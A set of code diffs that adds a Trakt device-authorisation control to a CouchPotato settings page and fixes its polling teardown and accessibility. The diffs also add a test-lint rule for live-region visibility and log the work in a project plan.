-      // reflect what the server actually stored.
+      if (!ok) return;
+
+      // Same re-init as buttonField.execute(), so the now populated token
+      // fields (password inputs rendered from `values`) reflect what the
+      // server actually stored. Scheduled through later() like everything
+      // else, so teardown cancels it: this timer used to be invisible to
+      // cancellation and fired on a torn-down component.
       const panel = this.getPanel();
-      // Held so destroy() can cancel it. It is not this.pollTimer, so
-      // clearPoll() never saw it: authorise, switch settings tab inside
-      // 500ms, and a torn-down component still re-fetched settings and
-      // added a duplicate watcher.
-      if (panel) this.reinitTimer = setTimeout(() => panel.init(), 500);
+      if (panel) this.later(ended, () => panel.init(), 500);
     },
 
-    showError(message) {
-      this.clearPoll();
-      this.polling = false;
-      this.userCode = '';
-      this.verificationUrl = '';
-      this.statusText = message;
-      this.statusClass = 'text-cp-danger';
-      this.error = true;
-    },
-
-    clearPoll() {
-      if (this.pollTimer) {
-        clearTimeout(this.pollTimer);
-        this.pollTimer = null;
-      }
-    },
-
-    // Alpine 3 calls destroy() when the element is removed (e.g. switching
-    // settings tabs, which re-keys currentGroups' x-for and drops this
-    // group out of it); without it the pending setTimeout in poll() keeps
-    // firing on a detached scope, so a second "Start Authorisation" click
-    // after returning races the orphaned chain instead of finding it gone.
+    // Alpine 3 calls destroy() when the element is removed, e.g. switching
+    // settings tabs, which re-keys currentGroups' x-for and drops this group
+    // out of it. Cancelling the run is the whole teardown: it invalidates
+    // the token every continuation checks and drops every timer the run
+    // owns, so there is nothing left to enumerate and nothing to forget.
     destroy() {
-      this.destroyed = true;
-      this.clearPoll();
-      if (this.reinitTimer) {
-        clearTimeout(this.reinitTimer);
-        this.reinitTimer = null;
-      }
-      this.polling = false;
+      this.cancelRun();
     },
 
     getPanel() {

--- a/couchpotato/ui/templates/partials/settings/scripts.html
+++ b/couchpotato/ui/templates/partials/settings/scripts.html
@@ -732,6 +732,11 @@ function traktDeviceAuth() {
     error: false,
     expiresAt: 0,
     pollTimer: null,
+    // Set once by destroy(). Clearing pollTimer only cancels a poll that
+    // has not started yet; a fetch already in flight still resolves on a
+    // torn-down component and schedules the next one, which restarts the
+    // chain destroy() just stopped. Every await below re-checks this.
+    destroyed: false,
 
     async start() {
       // Re-entry guard, since the button stays focusable/clickable
@@ -743,11 +748,18 @@ function traktDeviceAuth() {
       this.error = false;
       this.userCode = '';
       this.verificationUrl = '';
-      this.statusText = '';
+      // Announce the busy state rather than clearing the region. The button's
+      // own label changes to "Starting", but that is only read if focus
+      // happens to be on the button; the live region is the programmatic
+      // equivalent WCAG 4.1.3 asks for. The window is not trivial: the server
+      // handler allows a 30s timeout against Trakt, so this can be seconds.
+      this.statusText = 'Contacting Trakt…';
+      this.statusClass = 'text-cp-muted';
 
       try {
         const resp = await fetch(CP.apiBase + '/automation.trakt.device_code/');
         const data = await resp.json();
+        if (this.destroyed) return;
 
         if (data.success) {
           this.userCode = data.user_code || '';
@@ -768,6 +780,7 @@ function traktDeviceAuth() {
     },
 
     async poll(intervalSeconds) {
+      if (this.destroyed) return;
       if (Date.now() > this.expiresAt) {
         this.showError('Authorisation code expired. Please start again.');
         return;
@@ -776,6 +789,7 @@ function traktDeviceAuth() {
       try {
         const resp = await fetch(CP.apiBase + '/automation.trakt.poll_token/');
         const data = await resp.json();
+        if (this.destroyed) return;
 
         if (data.success) {
           this.showSuccess(data.message || 'Authorisation successful.');
@@ -834,6 +848,7 @@ function traktDeviceAuth() {
     // firing on a detached scope, so a second "Start Authorisation" click
     // after returning races the orphaned chain instead of finding it gone.
     destroy() {
+      this.destroyed = true;
       this.clearPoll();
       this.polling = false;
     },

--- a/couchpotato/ui/templates/partials/settings/scripts.html
+++ b/couchpotato/ui/templates/partials/settings/scripts.html
@@ -737,6 +737,7 @@ function traktDeviceAuth() {
     // torn-down component and schedules the next one, which restarts the
     // chain destroy() just stopped. Every await below re-checks this.
     destroyed: false,
+    reinitTimer: null,
 
     async start() {
       // Re-entry guard, since the button stays focusable/clickable
@@ -773,6 +774,13 @@ function traktDeviceAuth() {
           this.showError(data.error || 'Failed to start authorisation.');
         }
       } catch (e) {
+        // A rejected fetch resumes here from an await too, so this path
+        // needs the same check as the resolve paths. Harmless while
+        // showError only writes reactive state, but showSuccess already
+        // schedules a timer, and the comment on `destroyed` promises every
+        // await re-checks. Making that true is cheaper than a comment the
+        // next person has to disbelieve.
+        if (this.destroyed) return;
         this.showError('Request failed: ' + e.message);
       }
 
@@ -806,6 +814,13 @@ function traktDeviceAuth() {
         // invalid code, denied, unexpected status): stop and report it.
         this.showError(data.error || 'Authorisation failed.');
       } catch (e) {
+        // A rejected fetch resumes here from an await too, so this path
+        // needs the same check as the resolve paths. Harmless while
+        // showError only writes reactive state, but showSuccess already
+        // schedules a timer, and the comment on `destroyed` promises every
+        // await re-checks. Making that true is cheaper than a comment the
+        // next person has to disbelieve.
+        if (this.destroyed) return;
         this.showError('Request failed: ' + e.message);
       }
     },
@@ -822,7 +837,11 @@ function traktDeviceAuth() {
       // populated token fields (password inputs, rendered from `values`)
       // reflect what the server actually stored.
       const panel = this.getPanel();
-      if (panel) setTimeout(() => panel.init(), 500);
+      // Held so destroy() can cancel it. It is not this.pollTimer, so
+      // clearPoll() never saw it: authorise, switch settings tab inside
+      // 500ms, and a torn-down component still re-fetched settings and
+      // added a duplicate watcher.
+      if (panel) this.reinitTimer = setTimeout(() => panel.init(), 500);
     },
 
     showError(message) {
@@ -850,6 +869,10 @@ function traktDeviceAuth() {
     destroy() {
       this.destroyed = true;
       this.clearPoll();
+      if (this.reinitTimer) {
+        clearTimeout(this.reinitTimer);
+        this.reinitTimer = null;
+      }
       this.polling = false;
     },
 

--- a/couchpotato/ui/templates/partials/settings/scripts.html
+++ b/couchpotato/ui/templates/partials/settings/scripts.html
@@ -715,6 +715,128 @@ function buttonField(section, opt) {
   };
 }
 
+/* ── Trakt device authorisation (issue #311) ──
+   Bespoke, not a generalisation of buttonField above: that helper is
+   single-shot (fetch once, show a message, refresh the panel), and this
+   flow needs a start call followed by a bounded poll loop with its own
+   expiry and a "still waiting" state in between, which buttonField cannot
+   express without turning it into something else entirely. */
+function traktDeviceAuth() {
+  return {
+    authorising: false,
+    polling: false,
+    userCode: '',
+    verificationUrl: '',
+    statusText: '',
+    statusClass: 'text-cp-muted',
+    error: false,
+    expiresAt: 0,
+    pollTimer: null,
+
+    async start() {
+      // Re-entry guard, since the button stays focusable/clickable
+      // (aria-disabled, not disabled) while a request or a poll is live.
+      if (this.authorising || this.polling) return;
+
+      this.clearPoll();
+      this.authorising = true;
+      this.error = false;
+      this.userCode = '';
+      this.verificationUrl = '';
+      this.statusText = '';
+
+      try {
+        const resp = await fetch(CP.apiBase + '/automation.trakt.device_code/');
+        const data = await resp.json();
+
+        if (data.success) {
+          this.userCode = data.user_code || '';
+          this.verificationUrl = data.verification_url || '';
+          this.expiresAt = Date.now() + (Number(data.expires_in) || 600) * 1000;
+          this.statusText = 'Waiting for authorisation…';
+          this.statusClass = 'text-cp-muted';
+          this.polling = true;
+          this.poll(Number(data.interval) || 5);
+        } else {
+          this.showError(data.error || 'Failed to start authorisation.');
+        }
+      } catch (e) {
+        this.showError('Request failed: ' + e.message);
+      }
+
+      this.authorising = false;
+    },
+
+    async poll(intervalSeconds) {
+      if (Date.now() > this.expiresAt) {
+        this.showError('Authorisation code expired. Please start again.');
+        return;
+      }
+
+      try {
+        const resp = await fetch(CP.apiBase + '/automation.trakt.poll_token/');
+        const data = await resp.json();
+
+        if (data.success) {
+          this.showSuccess(data.message || 'Authorisation successful.');
+          return;
+        }
+
+        if (data.pending) {
+          const next = Number(data.interval) || intervalSeconds;
+          this.pollTimer = setTimeout(() => this.poll(next), next * 1000);
+          return;
+        }
+
+        // Any non-pending, non-success response is terminal (expired,
+        // invalid code, denied, unexpected status): stop and report it.
+        this.showError(data.error || 'Authorisation failed.');
+      } catch (e) {
+        this.showError('Request failed: ' + e.message);
+      }
+    },
+
+    showSuccess(message) {
+      this.clearPoll();
+      this.polling = false;
+      this.userCode = '';
+      this.verificationUrl = '';
+      this.statusText = message;
+      this.statusClass = 'text-cp-success';
+
+      // Same re-init approach as buttonField.execute() above, so the now
+      // populated token fields (password inputs, rendered from `values`)
+      // reflect what the server actually stored.
+      const panel = this.getPanel();
+      if (panel) setTimeout(() => panel.init(), 500);
+    },
+
+    showError(message) {
+      this.clearPoll();
+      this.polling = false;
+      this.userCode = '';
+      this.verificationUrl = '';
+      this.statusText = message;
+      this.statusClass = 'text-cp-danger';
+      this.error = true;
+    },
+
+    clearPoll() {
+      if (this.pollTimer) {
+        clearTimeout(this.pollTimer);
+        this.pollTimer = null;
+      }
+    },
+
+    getPanel() {
+      let el = this.$el;
+      while (el && !el.__x_panel) el = el.parentElement;
+      if (!el) el = document.querySelector('[x-data="settingsPanel()"]');
+      return el ? Alpine.$data(el) : null;
+    },
+  };
+}
+
 /* ── Combined field (multi-row entries) ── */
 function combinedField(section, opt) {
   return {

--- a/couchpotato/ui/templates/partials/settings/trakt_auth.html
+++ b/couchpotato/ui/templates/partials/settings/trakt_auth.html
@@ -10,7 +10,7 @@
             type="button"
             :aria-disabled="(authorising || polling) ? 'true' : 'false'"
             :class="(authorising || polling) ? 'opacity-50 cursor-not-allowed' : ''"
-            class="px-4 py-2 rounded-md text-xs font-medium bg-cp-accent/20 text-cp-accent hover:bg-cp-accent/30 transition-colors"
+            class="px-4 py-2 rounded-md text-xs font-medium bg-cp-accent/10 text-cp-accent hover:bg-cp-accent/20 transition-colors"
             data-testid="trakt-start-auth">
       <span x-show="!authorising">Start Trakt Authorisation</span>
       <span x-show="authorising" class="flex items-center gap-2">

--- a/couchpotato/ui/templates/partials/settings/trakt_auth.html
+++ b/couchpotato/ui/templates/partials/settings/trakt_auth.html
@@ -1,0 +1,50 @@
+{# Trakt Device Authorisation (issue #311) #}
+{# Requires Alpine context: group #}
+{# Bespoke control for the Trakt watchlist automation group only -- see
+   scripts.html's traktDeviceAuth() for why this is not a mode bolted onto
+   buttonField. #}
+
+<template x-if="group.section === 'trakt' && group.name === 'trakt_automation'">
+  <div x-data="traktDeviceAuth()" class="mt-4 pt-3 border-t border-white/[0.04]">
+    <button @click="start()"
+            type="button"
+            :aria-disabled="(authorising || polling) ? 'true' : 'false'"
+            :class="(authorising || polling) ? 'opacity-50 cursor-not-allowed' : ''"
+            class="px-4 py-2 rounded-md text-xs font-medium bg-cp-accent/20 text-cp-accent hover:bg-cp-accent/30 transition-colors"
+            data-testid="trakt-start-auth">
+      <span x-show="!authorising">Start Trakt Authorisation</span>
+      <span x-show="authorising" class="flex items-center gap-2">
+        <svg aria-hidden="true" class="w-3 h-3 animate-spin" viewBox="0 0 24 24" fill="none">
+          <circle class="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" stroke-width="4"/>
+          <path class="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4z"/>
+        </svg>
+        Starting…
+      </span>
+    </button>
+
+    {#- Persistent live region: present in the DOM from render, never
+        conjured by x-if alongside its own content. A screen reader
+        announces a mutation to a node already in the accessibility tree,
+        not the arrival of a new one -- the same reasoning modals.html's
+        toast announcers and base.html's toast regions already record. Only
+        `x-show` (visibility) and `x-text` (content) change inside it. -#}
+    <div class="mt-3" role="status" aria-live="polite" data-testid="trakt-auth-status">
+      <div x-show="userCode" class="p-4 rounded-md bg-white/[0.03] border border-white/[0.06] text-center">
+        <p class="text-[11px] text-cp-muted mb-2">
+          Visit
+          <a :href="verificationUrl"
+             target="_blank"
+             rel="noopener noreferrer"
+             class="text-cp-accent hover:underline"
+             x-text="verificationUrl"
+             data-testid="trakt-verification-url"></a>
+          and enter this code
+        </p>
+        <p class="text-2xl font-mono font-bold tracking-widest select-all"
+           x-text="userCode"
+           data-testid="trakt-user-code"></p>
+      </div>
+      <p x-show="statusText" class="text-[11px]" :class="statusClass" x-text="statusText"></p>
+    </div>
+  </div>
+</template>

--- a/couchpotato/ui/templates/partials/settings/trakt_auth.html
+++ b/couchpotato/ui/templates/partials/settings/trakt_auth.html
@@ -6,14 +6,28 @@
 
 <template x-if="group.section === 'trakt' && group.name === 'trakt_automation'">
   <div x-data="traktDeviceAuth()" class="mt-4 pt-3 border-t border-white/[0.04]">
+    {#- State goes in the NAME, not only in a description. A description
+        pointing at the whole live region made every focus read the URL and
+        the code aloud again, for the rest of the session. The label now says
+        what the control is doing, which every screen reader reports on focus
+        with no description needed.
+
+        aria-disabled rather than disabled, so it keeps its place in the tab
+        order and stays reachable. That is also why it must NOT be dimmed:
+        WCAG 1.4.3 exempts inactive controls from contrast, and a control we
+        deliberately keep focusable and clickable is not inactive. Claiming
+        "available to assistive technology" for the ARIA and "inactive, so
+        contrast does not apply" for the colour, about the same state, cannot
+        both be true. Dimming took the label to 2.06:1 in light theme and the
+        scanner could not report it, because aria-disabled makes axe skip the
+        node entirely. -#}
     <button @click="start()"
             type="button"
-            aria-describedby="trakt-auth-status"
             :aria-disabled="(authorising || polling) ? 'true' : 'false'"
-            :class="(authorising || polling) ? 'opacity-50 cursor-not-allowed' : ''"
-            class="px-4 py-2 rounded-md text-xs font-medium bg-cp-accent/10 text-cp-accent hover:bg-cp-accent/20 transition-colors"
+            :class="(authorising || polling) ? 'cursor-not-allowed' : 'hover:bg-cp-accent/20'"
+            class="px-4 py-2 rounded-md text-xs font-medium bg-cp-accent/10 text-cp-accent transition-colors"
             data-testid="trakt-start-auth">
-      <span x-show="!authorising">Start Trakt Authorisation</span>
+      <span x-show="!authorising && !polling">Start Trakt Authorisation</span>
       <span x-show="authorising" class="flex items-center gap-2">
         <svg aria-hidden="true" class="w-3 h-3 animate-spin" viewBox="0 0 24 24" fill="none">
           <circle class="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" stroke-width="4"/>
@@ -21,6 +35,7 @@
         </svg>
         Starting…
       </span>
+      <span x-show="polling && !authorising">Waiting for Trakt…</span>
     </button>
 
     {#- Persistent live region: present in the DOM from render, never
@@ -45,7 +60,15 @@
            x-text="userCode"
            data-testid="trakt-user-code"></p>
       </div>
-      <p x-show="statusText" class="text-[11px]" :class="statusClass" x-text="statusText"></p>
+      {#- No x-show: x-text writes the message BEFORE x-show would remove
+          display:none, so every announcement landed in a node that was not
+          in the accessibility tree yet and produced no live event. Left
+          rendered, the text mutates a node already there, which is what
+          role="status" needs. An empty <p> collapses to zero height, so
+          this costs no layout and stays honestly invisible to a
+          toBeVisible assertion until it actually carries a message. -#}
+      <p class="text-[11px]" :class="statusClass" x-text="statusText"
+         data-testid="trakt-auth-message"></p>
     </div>
   </div>
 </template>

--- a/couchpotato/ui/templates/partials/settings/trakt_auth.html
+++ b/couchpotato/ui/templates/partials/settings/trakt_auth.html
@@ -8,6 +8,7 @@
   <div x-data="traktDeviceAuth()" class="mt-4 pt-3 border-t border-white/[0.04]">
     <button @click="start()"
             type="button"
+            aria-describedby="trakt-auth-status"
             :aria-disabled="(authorising || polling) ? 'true' : 'false'"
             :class="(authorising || polling) ? 'opacity-50 cursor-not-allowed' : ''"
             class="px-4 py-2 rounded-md text-xs font-medium bg-cp-accent/10 text-cp-accent hover:bg-cp-accent/20 transition-colors"
@@ -28,7 +29,7 @@
         not the arrival of a new one -- the same reasoning modals.html's
         toast announcers and base.html's toast regions already record. Only
         `x-show` (visibility) and `x-text` (content) change inside it. -#}
-    <div class="mt-3" role="status" aria-live="polite" data-testid="trakt-auth-status">
+    <div id="trakt-auth-status" class="mt-3" role="status" aria-live="polite" data-testid="trakt-auth-status">
       <div x-show="userCode" class="p-4 rounded-md bg-white/[0.03] border border-white/[0.06] text-center">
         <p class="text-[11px] text-cp-muted mb-2">
           Visit

--- a/scripts/check_test_traps.py
+++ b/scripts/check_test_traps.py
@@ -1383,36 +1383,98 @@ def check_live_region_visibility(path: Path, text: str):
     resolved first and assertions are then attributed to the element rather
     than matched textually on the assertion line.
 
+    Bindings are resolved LEXICALLY, in file order, so a variable rebound to a
+    different element later in the file does not carry the earlier element's
+    assertions with it. A file-wide `name -> testid` map was the first
+    spelling and it was wrong in the direction that matters: two tests each
+    using `status` for a different live region would let one element's
+    `toBeVisible()` satisfy the other.
+
+    Statements are joined before matching, not read line by line. That was the
+    second hole, and it was demonstrated on this rule's own first customer: a
+    locator written across three lines
+
+        const target = page.locator(
+          cond ? '[data-testid="a"]' : '[data-testid="b"]',
+        );
+
+    produced NO binding at all, so deleting its `toBeVisible()` left the
+    checker green. A guard against guards that cannot fail must not be one,
+    and it had that defect twice, in the two spellings a real spec actually
+    uses.
+
     A negative assertion (`not.toContainText`) is not text usage: "the code is
     gone" is satisfied identically by "the code never appeared", so it neither
     needs nor supplies visibility cover.
     """
     lines = strip_js_comments(text)
 
-    # variable -> test id, from `const x = page.locator('[data-testid="y"]')`
+    # Join only an UNFINISHED DECLARATION onto the line it starts on, so a
+    # locator split across lines is matched whole. Deliberately not a general
+    # statement joiner: an arrow-function test block never balances its
+    # parentheses on one line, so a general joiner swallowed the whole test
+    # into one unit and the binding branch then skipped that unit's own
+    # assertions. Measured: it silenced two evasion shapes this rule had
+    # previously caught, which is the wrong direction for a false-green gate.
+    decl = re.compile(r"^\s*(?:const|let|var)\s+\w+\s*=")
+    joined = []
+    buffer = ''
+    start_at = 0
+    for idx, line in enumerate(lines):
+        if buffer:
+            buffer = buffer + ' ' + line.strip()
+        elif decl.match(line) and (line.count('(') > line.count(')')
+                                   or line.count('[') > line.count(']')):
+            buffer = line.strip()
+            start_at = idx
+            continue
+        else:
+            joined.append((idx, line))
+            continue
+
+        if buffer.count('(') <= buffer.count(')') and buffer.count('[') <= buffer.count(']'):
+            joined.append((start_at, buffer))
+            buffer = ''
+    if buffer:
+        joined.append((start_at, buffer))
+
     binding = re.compile(
         r"""(?:const|let|var)\s+(\w+)\s*=\s*[^;]*?data-testid=["']([\w-]+)["']"""
     )
-    bound = {}
-    for line in lines:
-        m = binding.search(line)
-        if m and m.group(2) in _LIVE_REGION_TESTIDS:
-            bound[m.group(1)] = m.group(2)
 
-    if not bound:
+    if not any(t in "\n".join(lines) for t in _LIVE_REGION_TESTIDS):
         return
 
-    text_line = {}
-    has_visibility = set()
+    in_scope = {}          # variable -> the test id it currently refers to
+    text_line = {}         # test id -> first line asserting its text
+    has_visibility = set()  # test ids asserted visible
 
-    for idx, line in enumerate(lines):
-        for var, testid in bound.items():
+    for idx, line in joined:
+        bind = binding.search(line)
+        if bind:
+            var = bind.group(1)
+            # A single statement can name more than one element (a ternary
+            # picking between two test ids). Bind the variable to ALL of them,
+            # so a text assertion through it needs visibility cover for each.
+            found = [t for t in re.findall(r'''data-testid=["']([\w-]+)["']''', line)
+                     if t in _LIVE_REGION_TESTIDS]
+            if found:
+                in_scope[var] = tuple(found)
+            else:
+                # Rebound to something that is not a live region: the name no
+                # longer stands for the element, so drop it rather than let a
+                # later assertion be credited to the old one.
+                in_scope.pop(var, None)
+            continue
+
+        for var, testids in in_scope.items():
             if not re.search(r"expect\(\s*%s\s*\)" % re.escape(var), line):
                 continue
-            if "toBeVisible" in line or "toBeHidden" in line:
-                has_visibility.add(testid)
-            elif any(m in line for m in _TEXT_ONLY_MATCHERS) and "not." not in line:
-                text_line.setdefault(testid, idx + 1)
+            for testid in testids:
+                if "toBeVisible" in line or "toBeHidden" in line:
+                    has_visibility.add(testid)
+                elif any(m in line for m in _TEXT_ONLY_MATCHERS) and "not." not in line:
+                    text_line.setdefault(testid, idx + 1)
 
     for testid, line_no in sorted(text_line.items()):
         if testid in has_visibility:

--- a/scripts/check_test_traps.py
+++ b/scripts/check_test_traps.py
@@ -1344,6 +1344,91 @@ _CAPLOG_LEVEL_METHODS = {"at_level", "set_level"}
 _REMAPPED_LEVEL_NAMES = {"INFO"}
 
 
+#: Test ids whose element is a live region: something a screen reader
+#: announces, and which the page shows and hides. Asserting one of these by
+#: text alone cannot fail when the element is hidden, because `toContainText`
+#: and `toHaveText` read `textContent`, which `display:none` does not affect.
+#:
+#: Found twice on one branch in three rounds (#311). First the device code
+#: box: setting `x-show` to `false`, so no user could ever read the code they
+#: are told to type in, left every spec green including the one named
+#: "displays the code and URL". Then the status message, one element over,
+#: where the same mutation left all sixteen specs green across two files.
+#: The accessibility scans do not catch it either: axe skips hidden subtrees,
+#: so "zero violations" quietly becomes "nothing was scanned".
+#:
+#: Two instances of one class is a mechanism request rather than a third fix,
+#: per AGENTS.md. This is the mechanism.
+_LIVE_REGION_TESTIDS = (
+    "trakt-auth-status",
+    "trakt-auth-message",
+    "trakt-user-code",
+    "trakt-verification-url",
+)
+
+_TEXT_ONLY_MATCHERS = ("toContainText", "toHaveText")
+
+
+def check_live_region_visibility(path: Path, text: str):
+    """Flag a live region asserted by TEXT but never by VISIBILITY.
+
+    Scoped per ELEMENT, not per file. An earlier draft of this rule accepted
+    any `toBeVisible` anywhere in the file, which meant the device code box's
+    assertion covered the status message sitting right beside it, and the rule
+    could not fail on the very code that motivated it. That is the defect
+    class this file exists to catch, written into the checker for it.
+
+    Locators reach `expect()` through a variable
+    (`const status = page.locator('[data-testid="..."]')`), so the binding is
+    resolved first and assertions are then attributed to the element rather
+    than matched textually on the assertion line.
+
+    A negative assertion (`not.toContainText`) is not text usage: "the code is
+    gone" is satisfied identically by "the code never appeared", so it neither
+    needs nor supplies visibility cover.
+    """
+    lines = strip_js_comments(text)
+
+    # variable -> test id, from `const x = page.locator('[data-testid="y"]')`
+    binding = re.compile(
+        r"""(?:const|let|var)\s+(\w+)\s*=\s*[^;]*?data-testid=["']([\w-]+)["']"""
+    )
+    bound = {}
+    for line in lines:
+        m = binding.search(line)
+        if m and m.group(2) in _LIVE_REGION_TESTIDS:
+            bound[m.group(1)] = m.group(2)
+
+    if not bound:
+        return
+
+    text_line = {}
+    has_visibility = set()
+
+    for idx, line in enumerate(lines):
+        for var, testid in bound.items():
+            if not re.search(r"expect\(\s*%s\s*\)" % re.escape(var), line):
+                continue
+            if "toBeVisible" in line or "toBeHidden" in line:
+                has_visibility.add(testid)
+            elif any(m in line for m in _TEXT_ONLY_MATCHERS) and "not." not in line:
+                text_line.setdefault(testid, idx + 1)
+
+    for testid, line_no in sorted(text_line.items()):
+        if testid in has_visibility:
+            continue
+        yield (
+            line_no,
+            "`%s` is a live region, asserted by text but never by visibility "
+            "in this file. `toContainText` and `toHaveText` read textContent, "
+            "which `display:none` does not affect, so hiding this element "
+            "permanently leaves the spec green and the control unusable. The "
+            "axe scans do not cover the gap either: axe skips hidden "
+            "subtrees, so zero violations degrades to nothing scanned. Assert "
+            "`toBeVisible()` on this element." % testid,
+        )
+
+
 def check_python_test(path: Path, text: str):
     """Flag `caplog.at_level("INFO")`, which silently captures nothing.
 
@@ -1676,6 +1761,7 @@ def check_file(path: Path):
         yield from check_vitest_spec(path, text)
     elif _is_e2e_spec(path):
         yield from check_e2e_spec_guards(path, text)
+        yield from check_live_region_visibility(path, text)
     elif path.name == "Makefile" or path.name.endswith(".mk"):
         yield from check_makefile(path, text)
     elif path.name.endswith(WORKFLOW_SUFFIXES):

--- a/specs/PLAN-2026-09-07-post-sonarqube-followups.md
+++ b/specs/PLAN-2026-09-07-post-sonarqube-followups.md
@@ -416,7 +416,18 @@ only one of the two return paths. That guard is T1 below.
       registered API views whose only caller is `trakt.js`, which nothing
       serves. Anyone configuring Trakt today cannot complete authorisation.
       Port the control into `couchpotato/ui/`, or retire the endpoints if the
-      feature is not wanted, state: queued (needs: T5)
+      feature is not wanted.
+      BUILT AS A BESPOKE PARTIAL, not a mode on the shared `buttonField`
+      helper: that helper is single-shot (fetch, show a message, refresh) and
+      this flow needs a start call followed by a bounded poll loop with its
+      own expiry and a waiting state in between.
+      The `needs: T5` this entry carried is DROPPED, and it was never real.
+      T5 is a test guard over event wiring and has no bearing on whether a
+      settings control can be built. I worked T6 first without noticing the
+      plan said I could not, so the order was right and the declaration was
+      wrong. Second phantom dependency in this plan after T7's, both written
+      down and never checked.
+      state: pr-open
 - [x] T7: DONE, merged as #329. Issue #314, the folder browser announced `role="listbox"` and keeps
       none of it: no arrow keys, no `aria-selected`, no
       `aria-activedescendant`, every folder its own tab stop. Remove the ARIA
@@ -436,3 +447,39 @@ only one of the two return paths. That guard is T1 below.
       library. Data task, no PR, state: queued (needs: T7)
 
 ## Conductor log
+
+- 2026-09-08 T2/T4/T7 closeout merged as #331. Five review findings, all mine,
+  the largest being a data-loss claim that was not one: `deleteView` takes
+  `type` into `**kwargs` and never reads it, so the late-bound closure cannot
+  route a show deletion to movies. It is a wrong-results bug in list and
+  watch-history filtering. Merge was blocked with every check green because
+  `master` requires review threads to be RESOLVED, not merely replied to,
+  which surfaces only as `BLOCKED` with no reason.
+- 2026-09-08 T6 built, then two review passes on the branch, run in parallel
+  and independently. Both found the same top defect by different routes: the
+  poll loop outlived the component that owned it, so switching settings tabs
+  mid-authorisation and clicking Start again ran two loops, and when the user
+  finished authorising, one consumed the code and the other reported "no
+  device code" into the visible status. The user was told authorisation had
+  failed at the moment it succeeded.
+- 2026-09-08 The more valuable finding was that the tests could not SEE that
+  defect. Setting the code box to never display, so no user could ever read
+  the code they are told to type in, left all seven specs passing, including
+  the one named "displays the code and URL". Assertions read `textContent`,
+  which is present while hidden, and the accessibility scan skips hidden
+  subtrees, so "zero violations" had quietly become "nothing was scanned".
+- 2026-09-08 Three fix rounds on T6, which is the circuit-breaker limit, so
+  the last two items were finished directly rather than dispatched a fourth
+  time. Round two's teardown looked complete and closed half the hole: a
+  request already in flight still resolved on the destroyed component and
+  restarted the chain. Proven by restoring round two's version verbatim, at
+  which point the navigate-away test passes and the in-flight test fails with
+  Expected 2, Received 4.
+- 2026-09-08 One item cut from T6's scope and raised as #332 instead: four
+  copies of a lookup on `__x_panel`, which is read four times in the whole
+  repository and written zero times, so the walk always fails and the
+  fallback always fires. Real, but pre-existing, working today, and not this
+  branch's code.
+- 2026-09-08 T8 cannot proceed as written: it names five films and records
+  none of their titles, and they appear nowhere in the repository. Blocked on
+  the owner for the list rather than on any work.

--- a/specs/PLAN-2026-09-07-post-sonarqube-followups.md
+++ b/specs/PLAN-2026-09-07-post-sonarqube-followups.md
@@ -446,6 +446,8 @@ only one of the two return paths. That guard is T1 below.
 - [ ] T8: five films identified earlier today that are still not added to the
       library. Data task, no PR, state: queued (needs: T7)
 
+status: blocked-on-human: T6 tripped the rework circuit breaker at round 8. A fix of mine introduced a defect (the re-entry flag was claimed after an await, so a double click ran two authorisation flows), which is the one self-inflicted regression the rule says to escalate on rather than spend another round. Fixed and guarded, Expected 1 Received 2 against the regression. The decision is whether to land T6 now with each known variant guarded, or spend one deliberate pass restructuring start() and poll() so the class of defect becomes impossible rather than individually guarded. Every round has found another variant of the same shared-state-across-await problem, which reads as a design smell rather than bad luck.
+
 ## Conductor log
 
 - 2026-09-08 T2/T4/T7 closeout merged as #331. Five review findings, all mine,

--- a/tests/e2e/trakt-device-auth.a11y.spec.ts
+++ b/tests/e2e/trakt-device-auth.a11y.spec.ts
@@ -22,7 +22,17 @@ import { type Page } from '@playwright/test';
 const DEVICE_CODE_ROUTE = /automation\.trakt\.device_code/;
 const POLL_ROUTE = /automation\.trakt\.poll_token/;
 
-function deviceCodeResponse() {
+/**
+ * The interval is a parameter because the FIRST poll now waits for it, the
+ * same as every later one: an immediate first poll could never succeed (the
+ * user has not seen the code yet) and invited Trakt's 429, which doubles the
+ * interval for the rest of the flow.
+ *
+ * So a state that needs no poll uses a long interval to hold the code on
+ * screen without churn, and a state reached THROUGH a poll must use a short
+ * one or it simply never arrives.
+ */
+function deviceCodeResponse(interval = 30) {
   return {
     status: 200,
     contentType: 'application/json',
@@ -31,7 +41,7 @@ function deviceCodeResponse() {
       user_code: 'ABCD-1234',
       verification_url: 'https://trakt.tv/activate',
       expires_in: 600,
-      interval: 30,
+      interval,
     }),
   };
 }
@@ -98,8 +108,9 @@ async function openTraktGroupInState(
   page: Page,
   pollResponse: ReturnType<typeof pollPendingResponse>,
   expectedStatus: string,
+  interval = 30,
 ) {
-  await page.route(DEVICE_CODE_ROUTE, (route) => route.fulfill(deviceCodeResponse()));
+  await page.route(DEVICE_CODE_ROUTE, (route) => route.fulfill(deviceCodeResponse(interval)));
   await page.route(POLL_ROUTE, (route) => route.fulfill(pollResponse));
 
   await page.goto('/settings/');
@@ -142,11 +153,11 @@ async function openTraktGroupWithCodeDisplayed(page: Page) {
 }
 
 async function openTraktGroupWithSuccess(page: Page) {
-  await openTraktGroupInState(page, pollSuccessResponse(), 'Authorisation successful! Trakt is now connected.');
+  await openTraktGroupInState(page, pollSuccessResponse(), 'Authorisation successful! Trakt is now connected.', 1);
 }
 
 async function openTraktGroupWithError(page: Page) {
-  await openTraktGroupInState(page, pollErrorResponse(), 'Device code expired. Please start authorisation again.');
+  await openTraktGroupInState(page, pollErrorResponse(), 'Device code expired. Please start authorisation again.', 1);
 }
 
 /**

--- a/tests/e2e/trakt-device-auth.a11y.spec.ts
+++ b/tests/e2e/trakt-device-auth.a11y.spec.ts
@@ -50,7 +50,7 @@ function pollSuccessResponse() {
     contentType: 'application/json',
     body: JSON.stringify({
       success: true,
-      message: 'Authorization successful! Trakt is now connected.',
+      message: 'Authorisation successful! Trakt is now connected.',
     }),
   };
 }
@@ -61,7 +61,7 @@ function pollErrorResponse() {
     contentType: 'application/json',
     body: JSON.stringify({
       success: false,
-      error: 'Device code expired. Please start authorization again.',
+      error: 'Device code expired. Please start authorisation again.',
     }),
   };
 }
@@ -126,11 +126,11 @@ async function openTraktGroupWithCodeDisplayed(page: Page) {
 }
 
 async function openTraktGroupWithSuccess(page: Page) {
-  await openTraktGroupInState(page, pollSuccessResponse(), 'Authorization successful! Trakt is now connected.');
